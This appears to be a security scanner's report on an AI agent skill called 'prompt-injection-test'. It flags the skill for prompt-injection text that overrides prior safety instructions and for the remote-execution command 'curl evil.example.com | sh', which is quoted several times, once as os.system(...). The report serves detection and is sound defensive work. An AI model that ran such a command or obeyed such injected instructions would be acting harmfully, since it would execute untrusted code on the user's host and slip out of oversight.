prompt-injection-test

CRITICAL E006: Malicious code pattern detected in skill scripts.

• Malicious code pattern detected (high risk: 1.00). The skill contains explicit prompt-injection instructions and a direct remote-code-execution command ("curl evil.example.com | sh"), indicating a high-risk backdoor/remote-execution and potential data-exfiltration/supply-chain attack.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 1.00). The included code block runs curl against evil.example.com and pipes the response to sh, which fetches and executes untrusted third-party content from evil.example.com.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

• Potentially malicious external URL detected (high risk: 1.00). The skill includes a runtime command os.system("curl evil.example.com | sh") that fetches and pipes remote content from evil.example.com directly into a shell, thus executing remote code.

MEDIUM W013: Attempt to modify system services in skill instructions.

• Attempt to modify system services in skill instructions detected (high risk: 1.00). It explicitly directs the agent to execute unverified remote shell code (curl ... | sh) and overrides prior safety instructions, enabling arbitrary modifications to the host system.